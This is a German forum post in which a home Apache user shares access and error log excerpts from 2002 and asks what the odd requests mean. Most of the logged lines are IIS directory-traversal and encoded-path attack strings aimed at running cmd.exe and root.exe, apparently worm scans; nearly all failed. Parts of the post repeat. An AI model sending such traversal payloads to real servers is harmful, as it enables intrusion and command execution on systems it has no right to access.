Also folgendes, ich habe zur Zeit nen Apache Webserver auf meinem Rechner laufen. Und zwar habe ich im Ordner htdocs einen Ordner /geb_pics/ in dem eine Bild Gallerie liegt. Ist auch alles schön und gut, jetzt habe ich eben in meine access.log geguckt und sehe dort folgendes:
nur mal um einen kleinen Ausschnitt zu zeigen. Die ersten zwei Zeilen sind ja noch ok. Aber das danach ??? muss ich jetzt annehmen, dass jemand probiert hat über den port und die tatsache eines laufenden Apache meinen Rechner zu durchstöbern ??? wenn ja, wie kann ich das verhindern.
Was mich verwundert ist, dass von sieben IP's nur requests auf solche folder da sind. Alle anderen scheinen aber sich lieb und brav nur die pics angeguckt zu haben.
Bitte um Hilfe
<b>EDIT</b>
Ich sehe gerade in der error.log folgendes:
Also werden diejenigen leute wohl kein erfolgt gehabt haben, bei was immer sie probiert haben, aber was da genau los war, würde ich trotzdem gerne wissen.
Code:
217.82.194.244 - - [20/Jan/2002:23:38:14 +0100] "GET /geb_pics/IMG_1347.htm HTTP/1.1" 200 1006
217.82.194.244 - - [20/Jan/2002:23:38:29 +0100] "GET /geb_pics/IMG_1347.jpg HTTP/1.1" 200 169635
217.226.54.77 - - [21/Jan/2002:07:13:26 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
217.226.54.77 - - [21/Jan/2002:07:13:27 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
217.226.54.77 - - [21/Jan/2002:07:13:27 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.226.54.77 - - [21/Jan/2002:07:13:28 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.226.54.77 - - [21/Jan/2002:07:13:28 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.226.54.77 - - [21/Jan/2002:07:13:28 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.226.54.77 - - [21/Jan/2002:07:13:29 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.226.54.77 - - [21/Jan/2002:07:13:29 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
217.226.54.77 - - [21/Jan/2002:07:13:29 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 295
217.226.54.77 - - [21/Jan/2002:07:13:30 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.226.54.77 - - [21/Jan/2002:07:13:30 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.226.54.77 - - [21/Jan/2002:07:13:31 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.226.54.77 - - [21/Jan/2002:07:13:31 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.226.54.77 - - [21/Jan/2002:07:13:32 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.226.54.77 - - [21/Jan/2002:07:13:32 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.226.54.77 - - [21/Jan/2002:07:13:32 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.82.143.190 - - [21/Jan/2002:08:01:50 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
217.82.143.190 - - [21/Jan/2002:08:01:52 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
217.82.143.190 - - [21/Jan/2002:08:01:53 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.82.143.190 - - [21/Jan/2002:08:01:54 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.82.143.190 - - [21/Jan/2002:08:01:55 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.82.143.190 - - [21/Jan/2002:08:01:56 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.82.143.190 - - [21/Jan/2002:08:01:56 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
Was mich verwundert ist, dass von sieben IP's nur requests auf solche folder da sind. Alle anderen scheinen aber sich lieb und brav nur die pics angeguckt zu haben.
Bitte um Hilfe
<b>EDIT</b>
Ich sehe gerade in der error.log folgendes:
Code:
[Mon Jan 21 11:57:01 2002] [error] [client 217.82.143.190] File does not exist: c:/apache/htdocs/scripts/..Áœ/winnt/system32/cmd.exe
[Mon Jan 21 11:57:04 2002] [error] [client 217.82.143.190] File does not exist: c:/apache/htdocs/scripts/..%5c/winnt/system32/cmd.exe
[Mon Jan 21 11:57:05 2002] [error] [client 217.82.143.190] File does not exist: c:/apache/htdocs/scripts/..%2f/winnt/system32/cmd.exe
Also werden diejenigen leute wohl kein erfolgt gehabt haben, bei was immer sie probiert haben, aber was da genau los war, würde ich trotzdem gerne wissen.
Zuletzt bearbeitet: